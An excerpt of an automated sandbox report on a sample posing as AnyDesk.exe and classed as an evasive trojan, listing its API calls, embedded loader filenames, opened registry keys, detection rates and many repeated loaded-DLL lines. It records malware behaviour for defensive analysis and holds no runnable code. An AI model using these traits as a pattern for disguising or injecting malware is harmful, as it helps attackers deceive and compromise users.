      Source: C:\Users\user\Desktop\AnyDesk.exeCode function: 0_2_02B38D6E GetThreadContext,SetThreadContext,NtResumeThread,0_2_02B38D6E
      Source: C:\Users\user\Desktop\AnyDesk.exeCode function: 0_2_02B3F7C8 InetIsOffline,CoInitialize,CoUninitialize,CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess,0_2_02B3F7C8
      Source: C:\Users\user\Desktop\AnyDesk.exeCode function: 0_2_02B220C40_2_02B220C4
      Source: C:\Users\user\Desktop\AnyDesk.exeCode function: 0_2_02B4E5960_2_02B4E596
      Source: C:\Users\user\Desktop\AnyDesk.exeCode function: String function: 02B244DC appears 74 times
      Source: C:\Users\user\Desktop\AnyDesk.exeCode function: String function: 02B3894C appears 56 times
      Source: C:\Users\user\Desktop\AnyDesk.exeCode function: String function: 02B24860 appears 949 times
      Source: C:\Users\user\Desktop\AnyDesk.exeCode function: String function: 02B24500 appears 33 times
      Source: C:\Users\user\Desktop\AnyDesk.exeCode function: String function: 02B246D4 appears 244 times
      Source: C:\Users\user\Desktop\AnyDesk.exeCode function: String function: 02B389D0 appears 45 times
      Source: AnyDesk.exeBinary or memory string: OriginalFilename vs AnyDesk.exe
      Source: AnyDesk.exe, 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs AnyDesk.exe
      Source: AnyDesk.exe, 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs AnyDesk.exe
      Source: AnyDesk.exe, 00000000.00000002.3383259657.000000007F9FF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs AnyDesk.exe
      Source: AnyDesk.exe, 00000000.00000003.2120469469.000000000286E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs AnyDesk.exe
      Source: AnyDesk.exe, 00000000.00000002.3368038850.0000000002AA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs AnyDesk.exe
      Source: AnyDesk.exe, 00000000.00000003.2120740305.000000007F880000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs AnyDesk.exe
      Source: AnyDesk.exe, 00000000.00000003.2120740305.000000007F880000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs AnyDesk.exe
      Source: AnyDesk.exe, 00000000.00000003.2119845710.000000007FA90000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs AnyDesk.exe
      Source: AnyDesk.exe, 00000000.00000002.3368038850.0000000002AAC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs AnyDesk.exe
      Source: AnyDesk.exe, 00000000.00000003.2120469469.0000000002872000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs AnyDesk.exe
      Source: AnyDesk.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
      Source: classification engineClassification label: mal76.troj.evad.winEXE@1/0@2/1
      Source: C:\Users\user\Desktop\AnyDesk.exeCode function: 0_2_02B27FD2 GetDiskFreeSpaceA,0_2_02B27FD2
      Source: C:\Users\user\Desktop\AnyDesk.exeCode function: 0_2_02B36DC8 CoCreateInstance,0_2_02B36DC8
      Source: C:\Users\user\Desktop\AnyDesk.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: AnyDesk.exeReversingLabs: Detection: 65%
      Source: AnyDesk.exeVirustotal: Detection: 31%
      Source: C:\Users\user\Desktop\AnyDesk.exeFile read: C:\Users\user\Desktop\AnyDesk.exeJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: url.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ieframe.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: netapi32.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ?p .dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ???p.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
      Source: C:\Users\user\Desktop\AnyDesk.exeSection loaded: ??.dllJump to behavior
